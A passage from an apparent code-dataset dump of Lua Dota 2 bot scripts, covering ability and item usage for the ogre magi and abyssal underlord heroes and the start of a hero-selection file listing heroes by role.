"text": "local build = require(GetScriptDirectory()..\"/item_build_ogre_magi\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal fireblast = npcBot:GetAbilityByName(\"ogre_magi_fireblast\")\nlocal ignite = npcBot:GetAbilityByName(\"ogre_magi_ignite\")\nlocal bloodlust = npcBot:GetAbilityByName(\"ogre_magi_bloodlust\")\nlocal form = npcBot:GetAbilityByName(\"ogre_magi_unrefined_fireblast\")\n\nfunction BuybackUsageThink()end\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal currMana = npcBot:GetMana()\n\tlocal maxMana = npcBot:GetMaxMana()\n\tlocal currHP = npcBot:GetHealth()\n\tlocal maxHP = npcBot:GetMaxHealth()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\n\t-- Nearby Units\n\tlocal allies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal enemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal enemyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n\tlocal allyCreeps = npcBot:GetNearbyLaneCreeps(1000, false)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\t\n\tlocal numAllies = table.getn(allies)\n\tlocal numEnemies = table.getn(enemies)\n\tlocal numEnemyCreeps = table.getn(enemyCreeps)\n\tlocal numAllyCreeps = table.getn(allyCreeps)\n\tlocal numNeutrals = table.getn(neutrals)\n\t\n\t-- Use BLOODLUST\n\tif bloodlust:IsFullyCastable() and numEnemies > 0 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif numAllies > 0 then\n\t\t\tfor a = 1, numAllies do\n\t\t\t\tlocal ally = allies[a]\n\t\t\t\t\n\t\t\t\tif not ally:HasModifier(\"modifier_ogre_magi_bloodlust\") then\n\t\t\t\t\tlocal allyTarget = ally:GetAttackTArget()\n\t\t\t\t\t\n\t\t\t\t\tif allyTarget ~= nil and allyTarget:IsHero() then\n\t\t\t\t\t\tnpcBot:Action_UseAbilityOnEntity(bloodlust, ally)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telseif mode == BOT_MODE_ATTACK then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(bloodlust, npcBot)\n\t\tend\n\tend\n\t\n\t-- Use FIREBLAST\n\tif fireblast:IsFullyCastable() and numEnemies > 0 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal enemyDist = GetUnitToUnitDistance(npcBot, enemies[1])\n\t\t\n\t\tif mode == BOT_MODE_ATTACK then\n \t\tnpcBot:Action_UseAbilityOnEntity(fireblast, enemies[1])\n\t\telseif enemies[1]:GetAttackTarget() == npcBot then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(fireblast, enemies[1])\n\t\tend\n\telseif fireblast:IsFullyCastable() and numEnemyCreeps > 3 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tfor c = 1, numEnemyCreeps do\n\t\t\tlocal enemy = enemyCreeps[c]\n\t\t\t\n\t\t\tif enemy:GetHealth() / enemy:GetMaxHealth() == 1 then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(fireblast, enemy)\n\t\t\tend \n\t\tend\n\tend\n\t\n\t-- Use IGNITE\n\tif ignite:IsFullyCastable() and numEnemies > 0 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tnpcBot:Action_UseAbilityOnEntity(ignite, enemies[1])\n\telseif ignite:IsFullyCastable() and numEnemyCreeps > 3 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tfor c = 1, numEnemyCreeps do\n\t\t\tlocal enemy = enemyCreeps[c]\n\t\t\t\n\t\t\tif 
enemy:GetHealth() / enemy:GetMaxHealth() == 1 then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(ignite, enemy)\n\t\t\tend \n\t\tend\n\tend\nend\n\nfunction ItemUsageThink()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal currentMode = npcBot:GetActiveMode()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal allies = npcBot:GetNearbyHeroes(1600, false, BOT_MODE_NONE)\n\n\t-- USABLE ITEMS --------------------------------------------------------------------------------\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\tlocal arcane = nil\n\tlocal cyclone = nil\n\tlocal midas = nil\n\tlocal wand = nil\n\tlocal glimmer = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\tlocal cycloneLoc = npcBot:FindItemSlot(\"item_cyclone\")\n\tlocal midasLoc = npcBot:FindItemSlot(\"item_hand_of_midas\")\n\tlocal wandLoc = npcBot:FindItemSlot(\"item_magic_wand\")\n\tlocal glimmerLoc = npcBot:FindItemSlot(\"item_glimmer_cape\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\tif npcBot:GetItemSlotType(cycloneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tcyclone = npcBot:GetItemInSlot(cycloneLoc)\n\tend\n\tif npcBot:GetItemSlotType(midasLoc) == ITEM_SLOT_TYPE_MAIN 
then\n\t\tmidas = npcBot:GetItemInSlot(midasLoc)\n\tend\n\tif npcBot:GetItemSlotType(wandLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\twand = npcBot:GetItemInSlot(wandLoc)\n\tend\n\tif npcBot:GetItemSlotType(glimmerLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tglimmer = npcBot:GetItemInSlot(glimmerLoc)\n\tend\n\t------------------------------------------------------------------------------------------------\n\n\t-- BOUNTY RUNE PICKUP --------------------------------------------------------------------------\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t------------------------------------------------------------------------------------------------\n\t\n\t-- HAND OF MIDAS Usage -------------------------------------------------------------------------\n\tif midas ~= nil then\n\t\tlocal midasTarget = _G.getMidasTarget(npcBot)\n\t\t\n\t\tif midasTarget ~= nil and midas:IsCooldownReady() and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(midas, midasTarget)\n\t\tend\n\tend\n\t------------------------------------------------------------------------------------------------\n\t\n\t-- GLIMMER CAPE Usage --------------------------------------------------------------------------\n\tif glimmer ~= nil then\n\t\tif table.getn(enemies) > 0 and table.getn(allies) > 0 then\n\t\t\tlocal allyToEnemyDist = GetUnitToUnitDistance(enemies[1], allies[1])\n\t\t\t\n\t\t\tif allyToEnemyDist < 1000 and botAction ~= BOT_ACTION_TYPE_USE_ABILITY and glimmer:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(glimmer, allies[1])\n\t\t\tend\n\t\telseif table.getn(enemies) > 0 and table.getn(allies) == 0 then\n\t\t\tlocal botToEnemyDist = GetUnitToUnitDistance(npcBot, enemies[1])\n\t\t\t\n\t\t\t-- No ally in range, so the cape goes on the bot itself.\n\t\t\tif botToEnemyDist < 500 and botAction ~= BOT_ACTION_TYPE_USE_ABILITY and glimmer:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(glimmer, npcBot)\n\t\t\tend\n\t\tend\n\tend\n\t------------------------------------------------------------------------------------------------\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif arcane ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\t\n\tif cyclone ~= nil and cyclone:IsCooldownReady() and currentMode == BOT_MODE_RETREAT then\n\t\tif table.getn(enemies) > 0 then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(cyclone, enemies[1])\n\t\tend\n\tend\n\t\n\t-- Mana Regen\n\tif botMana / botMaxMana < 0.5 and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif arcane ~= nil and arcane:IsCooldownReady() then\n\t\t\tprint(\" Using ARCANE BOOTS\")\n \t\tnpcBot:Action_UseAbility(arcane)\n\t\telseif (bottle == nil and clarity ~= nil) or 
(bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or (boots == nil and clarity ~= nil) then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n -- HP Regen\n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t-- Find trees up front so the tango branch can test availability.\n\t\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif wand ~= nil and wand:GetCurrentCharges() > 3 then\n\t\t\tnpcBot:Action_UseAbility(wand)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n    -- Use Courier\n\tif npcBot:GetItemSlotType(courierLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\nend\n"
},
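The bounty-rune section in the ogre magi script above checks the four spawn points with four near-identical branches. Since the rune constants are already enumerable, a loop does the same work; a sketch using only calls that appear in the script:

```lua
local BOUNTY_RUNES = { RUNE_BOUNTY_1, RUNE_BOUNTY_2, RUNE_BOUNTY_3, RUNE_BOUNTY_4 }

-- Pick up the first bounty rune within 200 units; returns true once an
-- action was issued. A distance of 0 is treated as unknown/invalid,
-- matching the guard in the original branches.
local function pickupNearbyBountyRune(bot)
    for _, rune in ipairs(BOUNTY_RUNES) do
        local dist = GetUnitToLocationDistance(bot, GetRuneSpawnLocation(rune))
        if dist < 200 and dist ~= 0 then
            bot:Action_PickUpRune(rune)
            return true
        end
    end
    return false
end
```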
{
"alpha_fraction": 0.5678815245628357,
"alphanum_fraction": 0.575419008731842,
"avg_line_length": 39.71480178833008,
"blob_id": "dcde14047e2a25ce4bcb289799bc2165e6973e35",
"content_id": "9abd01ff38656164f6f183fae0620f01d1b6ef4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 11277,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 277,
"path": "/ability_item_usage_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_abyssal_underlord\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\nlocal UnderDarkRift = false\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n print(npcBot:GetAbilityPoints(), skillsToLevel[1])\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local botMaxMana = npcBot:GetMaxMana()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local firestorm = npcBot:GetAbilityByName(\"abyssal_underlord_firestorm\")\n local pit_of_malice = npcBot:GetAbilityByName(\"abyssal_underlord_pit_of_malice\")\n local atrophy_aura = npcBot:GetAbilityByName(\"abyssal_underlord_atrophy_aura\")\n local dark_rift = npcBot:GetAbilityByName(\"abyssal_underlord_dark_rift\")\n local cancel_dark_rift = npcBot:GetAbilityByName(\"abyssal_underlord_cancel_dark_rift\")\n\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n\n if dark_rift:GetCooldownTimeRemaining() ~= 0 then\n UnderDarkRift = false\n end\n\n -- Fire storm think --\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= action ~= BOT_ACTION_TYPE_MOVE_TO then\n if not npcBot:IsChanneling() then\n fire_power_count = 0\n if #nearbyEnemies > 0 then\n for j, enemy in pairs(nearbyEnemies) do\n fire_power_count = fire_power_count + 2\n end\n end\n if #nearbyCreeps > 0 then\n for j, creep in pairs(nearbyCreeps) do\n fire_power_count = fire_power_count + 1\n end\n end\n if fire_power_count >= 4 then\n if firestorm:GetCooldownTimeRemaining() == 0 then\n local soulRingSlot = npcBot:FindItemSlot(\"item_soul_ring\")\n local soulRing = nil\n if npcBot:GetItemSlotType(soulRingSlot) == ITEM_SLOT_TYPE_MAIN then\n soulRing = npcBot:GetItemInSlot(soulRingSlot)\n end\n if soulRing ~= nil then\n if soulRing:IsFullyCastable() and botMana < 300 and botHealth > 400 then\n npcBot:Action_UseAbility(soulRing)\n end\n end\n -- calculate the location --\n local x_avg = 0\n local y_avg = 0\n if #nearbyCreeps > 0 then\n for i, creep in ipairs(nearbyCreeps) do\n x_avg = x_avg + creep:GetLocation()[1]\n y_avg = y_avg + creep:GetLocation()[2]\n end\n end\n if #nearbyEnemies > 0 then\n for i, hero in ipairs(nearbyEnemies) do\n x_avg = x_avg + hero:GetLocation()[1]\n y_avg = y_avg + hero:GetLocation()[2]\n end\n end\n size = #nearbyCreeps + #nearbyEnemies\n fire_location = Vector(x_avg/size, y_avg/size, 0)\n\n -- print(\"Ability : Using Fire Storm at \", fire_location)\n if firestorm:IsFullyCastable() then\n npcBot:Action_UseAbilityOnLocation(firestorm, fire_location)\n end\n end\n end\n end\n end\n\n -- pit of malice think --\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= action ~= 
BOT_ACTION_TYPE_MOVE_TO then\n if action_mode == BOT_MODE_ATTACK or action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_DEFEND_ALLY or action_mode == BOT_MODE_EVASIVE_MANEUVERS then\n if not npcBot:IsChanneling() then\n pit_power_count = 0\n if #nearbyEnemies > 0 then\n for i, hero in ipairs(nearbyEnemies) do\n pit_power_count = pit_power_count + 2\n end\n end\n if pit_power_count >= 2 then\n if pit_of_malice:IsFullyCastable() then\n local soulRingSlot = npcBot:FindItemSlot(\"item_soul_ring\")\n local soulRing = nil\n if npcBot:GetItemSlotType(soulRingSlot) == ITEM_SLOT_TYPE_MAIN then\n soulRing = npcBot:GetItemInSlot(soulRingSlot)\n end\n if soulRing ~= nil then\n if soulRing:IsFullyCastable() and botMana < 300 and botHealth > 400 then\n npcBot:Action_UseAbility(soulRing)\n end\n end\n aoeLocations = npcBot:FindAoELocation(true, true, npcBot:GetLocation(), 900, 375, 1.0, 0)\n -- print(aoeLocations.count)\n pit_of_maliceLoc = aoeLocations.targetloc\n npcBot:Action_UseAbilityOnLocation(pit_of_malice, pit_of_maliceLoc)\n end\n end\n end\n end\n end\n\n -- dark rift think --\n if action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_EVASIVE_MANEUVERS then\n if #nearbyEnemies >= 1 then\n if dark_rift:IsFullyCastable() and not UnderDarkRift then\n print(\"Using Dark Rift\")\n npcBot:ActionImmediate_Chat(\"I'm Casting Dark Rift back to Base! Come to me!!\", false)\n npcBot:Action_UseAbilityOnLocation(dark_rift, GetAncient(botTeam):GetLocation())\n UnderDarkRift = true\n end\n end\n end\n\n -- Hood of Defiance --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local hoodSlot = npcBot:FindItemSlot(\"item_hood_of_defiance\")\n local hood = nil\n if npcBot:GetItemSlotType(hoodSlot) == ITEM_SLOT_TYPE_MAIN then\n hood = npcBot:GetItemInSlot(hoodSlot)\n end\n if hood ~= nil then\n if hood:IsFullyCastable() then\n npcBot:Action_UseAbility(hood)\n end\n end\n end\n\n -- Pipe of Insight --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local pipeSlot = npcBot:FindItemSlot(\"item_pipe\")\n local pipe = nil\n if npcBot:GetItemSlotType(pipeSlot) == ITEM_SLOT_TYPE_MAIN then\n pipe = npcBot:GetItemInSlot(pipeSlot)\n end\n if pipe ~= nil then\n if pipe:IsFullyCastable() then\n npcBot:Action_UseAbility(pipe)\n end\n end\n end\n\n -- Crimson Guard --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local crimsonSlot = npcBot:FindItemSlot(\"item_crimson_guard\")\n local crimson = nil\n if npcBot:GetItemSlotType(crimsonSlot) == ITEM_SLOT_TYPE_MAIN then\n crimson = npcBot:GetItemInSlot(crimsonSlot)\n end\n if crimson ~= nil then\n if crimson:IsFullyCastable() then\n npcBot:Action_UseAbility(crimson)\n end\n end\n end\n\n -- Guardian Greaves --\n local guardianGreavesSlot = npcBot:FindItemSlot(\"item_guardian_greaves\")\n local guardianGreaves = nil\n if npcBot:GetItemSlotType(guardianGreavesSlot) == ITEM_SLOT_TYPE_MAIN then\n guardianGreaves = npcBot:GetItemInSlot(guardianGreavesSlot)\n end\n local use_guardian = false\n if npcBot:HasModifier(\"modifier_silence\") or npcBot:HasModifier(\"modifier_silencer_global_silence\") then\n use_guardian = true\n else\n if botMana/botMaxMana < 0.5 or botHealth/botMaxHealth < 0.75 then\n use_guardian = 
true\n else\n nearbyAllies = npcBot:GetNearbyHeroes(900, false, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies) do\n allyHealth = ally:GetHealth()\n allyMaxHealth = ally:GetMaxHealth()\n allyMana = ally:GetMana()\n allyMaxMana = ally:GetMaxMana()\n if allyHealth/allyMaxHealth < 0.5 or allyMana/allyMaxMana<0.5 then\n use_guardian = true\n break\n end\n end\n end\n end\n if guardianGreaves ~= nil and use_guardian then\n if guardianGreaves:IsFullyCastable() then\n npcBot:Action_UseAbility(guardianGreaves)\n end\n end\n\n -- Shiva's Guard --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local shivaSlot = npcBot:FindItemSlot(\"item_shivas_guard\")\n local shiva = nil\n if npcBot:GetItemSlotType(shivaSlot) == ITEM_SLOT_TYPE_MAIN then\n shiva = npcBot:GetItemInSlot(shivaSlot)\n end\n if shiva ~= nil then\n if shiva:IsFullyCastable() then\n npcBot:Action_UseAbility(shiva)\n end\n end\n end\n\n -- magic wand --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local wandSlot = npcBot:FindItemSlot(\"item_magic_wand\")\n local wand = nil\n if npcBot:GetItemSlotType(wandSlot) == ITEM_SLOT_TYPE_MAIN then\n wand = npcBot:GetItemInSlot(wandSlot)\n end\n if wand ~= nil and (wand:GetCurrentCharges() > 10 or botHealth < 100 or botMana < 100) then\n if wand:IsFullyCastable() then\n npcBot:Action_UseAbility(wand)\n end\n end\n end\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
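The firestorm block above aims at the average position of nearby creeps and heroes. Factored out, that targeting is just a centroid over unit locations; a standalone sketch (assumes the list passed in is non-empty):

```lua
-- Average the x/y coordinates of a unit list into a castable map location.
local function centroid(units)
    local x, y = 0, 0
    for _, unit in ipairs(units) do
        local loc = unit:GetLocation()
        x = x + loc[1]
        y = y + loc[2]
    end
    return Vector(x / #units, y / #units, 0)
end

-- e.g. npcBot:Action_UseAbilityOnLocation(firestorm, centroid(nearbyCreeps))
```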
{
"alpha_fraction": 0.6747816801071167,
"alphanum_fraction": 0.6831285357475281,
"avg_line_length": 23.007421493530273,
"blob_id": "e194e92de806a9737a3eacd38d54c40cb8218c6c",
"content_id": "5cf502f3283f25dfd441aafdd8112f06e7c9e180",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 12939,
"license_type": "no_license",
"max_line_length": 215,
"num_lines": 539,
"path": "/hero_selection.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local pickTime=GameTime();\nlocal randomTime=0;\n\ncarry_heroes = {\n\t\"npc_dota_hero_antimage\",\n\t\"npc_dota_hero_drow_ranger\",\n\t\"npc_dota_hero_juggernaut\",\n\t\"npc_dota_hero_morphling\",\n\t\"npc_dota_hero_phantom_lancer\",\n\t\"npc_dota_hero_sven\",\n\t\"npc_dota_hero_skeleton_king\",\n\t\"npc_dota_hero_luna\",\n\t\"npc_dota_hero_life_stealer\",\n\t\"npc_dota_hero_clinkz\",\n\t\"npc_dota_hero_weaver\",\n\t\"npc_dota_hero_spectre\",\n\t\"npc_dota_hero_ursa\",\n\t\"npc_dota_hero_gyrocopter\",\n\t\"npc_dota_hero_lycan\",\n\t\"npc_dota_hero_lone_druid\",\n\t\"npc_dota_hero_chaos_knight\",\n\t\"npc_dota_hero_naga_siren\",\n\t\"npc_dota_hero_slark\",\n\t\"npc_dota_hero_troll_warlord\",\n\t\"npc_dota_hero_terrorblade\",\n\t\"npc_dota_hero_arc_warden\",\n\t\"npc_dota_hero_monkey_king\",\n}\nmid_heroes = {\n\"npc_dota_hero_bloodseeker\",\n\"npc_dota_hero_mirana\",\n\"npc_dota_hero_nevermore\",\n\"npc_dota_hero_razor\",\n\"npc_dota_hero_storm_spirit\",\n\"npc_dota_hero_windrunner\",\n\"npc_dota_hero_zuus\",\n\"npc_dota_hero_kunkka\",\n\"npc_dota_hero_lina\",\n\"npc_dota_hero_tinker\",\n\"npc_dota_hero_sniper\",\n\"npc_dota_hero_necrolyte\",\n\"npc_dota_hero_queenofpain\",\n\"npc_dota_hero_venomancer\",\n\"npc_dota_hero_death_prophet\",\n\"npc_dota_hero_phantom_assassin\",\n\"npc_dota_hero_pugna\",\n\"npc_dota_hero_templar_assassin\",\n\"npc_dota_hero_viper\",\n\"npc_dota_hero_dragon_knight\",\n\"npc_dota_hero_leshrac\",\n\"npc_dota_hero_huskar\",\n\"npc_dota_hero_broodmother\",\n\"npc_dota_hero_alchemist\",\n\"npc_dota_hero_invoker\",\n\"npc_dota_hero_silencer\",\n\"npc_dota_hero_obsidian_destroyer\",\n\"npc_dota_hero_meepo\",\n\"npc_dota_hero_visage\",\n\"npc_dota_hero_medusa\",\n\"npc_dota_hero_ember_spirit\",\n}\noff_heroes = {\n\t\"npc_dota_hero_axe\",\n\t\"npc_dota_hero_puck\",\n\t\"npc_dota_hero_tiny\",\n\t\"npc_dota_hero_tidehunter\",\n\t\"npc_dota_hero_enigma\",\n\t\"npc_dota_hero_beastmaster\",\n\t\"npc_dota_hero_faceless_void\",\n\t\"npc_dota_hero_rattletrap\",\n\t\"npc_dota_hero_dark_seer\",\n\t\"npc_dota_hero_omniknight\",\n\t\"npc_dota_hero_enchantress\",\n\t\"npc_dota_hero_batrider\",\n\t\"npc_dota_hero_doom_bringer\",\n\t\"npc_dota_hero_brewmaster\",\n\t\"npc_dota_hero_centaur\",\n\t\"npc_dota_hero_magnataur\",\n\t\"npc_dota_hero_shredder\",\n\t\"npc_dota_hero_bristleback\",\n\t\"npc_dota_hero_abaddon\",\n\t\"npc_dota_hero_legion_commander\",\n\t\"npc_dota_hero_abyssal_underlord\",\n\t\"npc_dota_hero_pangolier\",\n}\nsupport_heroes = 
